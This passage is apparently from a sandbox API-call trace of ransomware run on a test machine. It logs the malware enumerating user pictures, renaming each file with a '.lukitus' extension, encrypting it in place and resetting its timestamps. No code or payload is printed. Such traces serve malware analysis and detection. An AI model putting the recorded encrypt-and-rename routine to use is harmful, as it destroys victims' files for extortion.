"c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-85a5b08a-605b60b6ebd6.lukitus"), dwFlags=0x9) returned 1 [0107.984] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.984] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.989] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x116ca, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x116ca, lpOverlapped=0x0) returned 1 [0107.989] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.990] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x116ca, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x116ca, lpOverlapped=0x0) returned 1 [0107.990] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.990] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64639f10, dwHighDateTime=0x1d31760)) [0107.990] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.991] FlushFileBuffers (hFile=0x328) returned 1 [0107.994] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\tClzdjxzFnQ5k.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\tclzdjxzfnq5k.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb842fa20, ftCreationTime.dwHighDateTime=0x1d2f976, ftLastAccessTime.dwLowDateTime=0x289599d0, ftLastAccessTime.dwHighDateTime=0x1d2fb3f, ftLastWriteTime.dwLowDateTime=0x289599d0, ftLastWriteTime.dwHighDateTime=0x1d2fb3f, nFileSizeHigh=0x0, nFileSizeLow=0x2bd0)) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.994] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.995] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.995] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\tClzdjxzFnQ5k.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\tclzdjxzfnq5k.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.995] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\tClzdjxzFnQ5k.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\tclzdjxzfnq5k.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-88881914-B3AE12B46247.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-88881914-b3ae12b46247.lukitus"), dwFlags=0x9) returned 1 [0108.025] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.025] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.031] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x2bd0, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x2bd0, lpOverlapped=0x0) returned 1 [0108.032] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.032] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x2bd0, lpOverlapped=0x0) returned 1 [0108.032] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.032] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x646ac330, dwHighDateTime=0x1d31760)) [0108.032] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.032] FlushFileBuffers (hFile=0x328) returned 1 [0108.061] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\6UEh0WGr8W.bmp" (normalized: "c:\\users\\aetadzjz\\desktop\\6ueh0wgr8w.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a2b420, ftCreationTime.dwHighDateTime=0x1d302b8, ftLastAccessTime.dwLowDateTime=0xc3085330, ftLastAccessTime.dwHighDateTime=0x1d2f776, ftLastWriteTime.dwLowDateTime=0xc3085330, ftLastWriteTime.dwHighDateTime=0x1d2f776, nFileSizeHigh=0x0, nFileSizeLow=0x11748)) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.061] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\6UEh0WGr8W.bmp" (normalized: "c:\\users\\aetadzjz\\desktop\\6ueh0wgr8w.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.062] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\6UEh0WGr8W.bmp" (normalized: "c:\\users\\aetadzjz\\desktop\\6ueh0wgr8w.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-786F2966-85DD58079D16.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-786f2966-85dd58079d16.lukitus"), dwFlags=0x9) returned 1 [0108.063] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.063] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.073] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x11748, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x11748, lpOverlapped=0x0) returned 1 [0108.074] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.074] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x11748, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x11748, lpOverlapped=0x0) returned 1 [0108.074] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.075] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6471e750, dwHighDateTime=0x1d31760)) [0108.075] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.075] FlushFileBuffers (hFile=0x328) returned 1 [0108.083] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\8umgBK9 _uxC-P0clK.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\8umgbk9 _uxc-p0clk.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeccfcdc0, ftCreationTime.dwHighDateTime=0x1d2f905, ftLastAccessTime.dwLowDateTime=0x94f00e30, ftLastAccessTime.dwHighDateTime=0x1d2f5bd, ftLastWriteTime.dwLowDateTime=0x94f00e30, ftLastWriteTime.dwHighDateTime=0x1d2f5bd, nFileSizeHigh=0x0, nFileSizeLow=0x8741)) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.083] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.084] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.084] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\8umgBK9 _uxC-P0clK.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\8umgbk9 _uxc-p0clk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.084] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\8umgBK9 _uxC-P0clK.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\8umgbk9 _uxc-p0clk.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\F56924BE-9663-41BB-160875AB-8C16168EF4DD.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\f56924be-9663-41bb-160875ab-8c16168ef4dd.lukitus"), dwFlags=0x9) returned 1 [0108.085] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.085] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.091] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8741, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8741, lpOverlapped=0x0) returned 1 [0108.093] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.093] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8741, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8741, lpOverlapped=0x0) returned 1 [0108.093] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.093] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x647448b0, dwHighDateTime=0x1d31760)) [0108.093] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.093] FlushFileBuffers (hFile=0x328) returned 1 [0108.099] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\kMVEz0TO.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\kmvez0to.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c855d80, ftCreationTime.dwHighDateTime=0x1d30285, ftLastAccessTime.dwLowDateTime=0xb6532450, ftLastAccessTime.dwHighDateTime=0x1d30106, ftLastWriteTime.dwLowDateTime=0xb6532450, ftLastWriteTime.dwHighDateTime=0x1d30106, nFileSizeHigh=0x0, nFileSizeLow=0x172a9)) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.099] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\kMVEz0TO.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\kmvez0to.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.099] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\kMVEz0TO.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\kmvez0to.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\F56924BE-9663-41BB-169E6313-C430F979B7E3.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\f56924be-9663-41bb-169e6313-c430f979b7e3.lukitus"), dwFlags=0x9) returned 1 [0108.102] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.102] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.108] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x172a9, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x172a9, lpOverlapped=0x0) returned 1 [0108.109] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.109] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x172a9, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x172a9, lpOverlapped=0x0) returned 1 [0108.110] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.110] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6476aa10, dwHighDateTime=0x1d31760)) [0108.110] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.110] FlushFileBuffers (hFile=0x328) returned 1 [0108.114] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\CS rWU_9qBGaWWl2CS.png" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\cs rwu_9qbgawwl2cs.png"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, 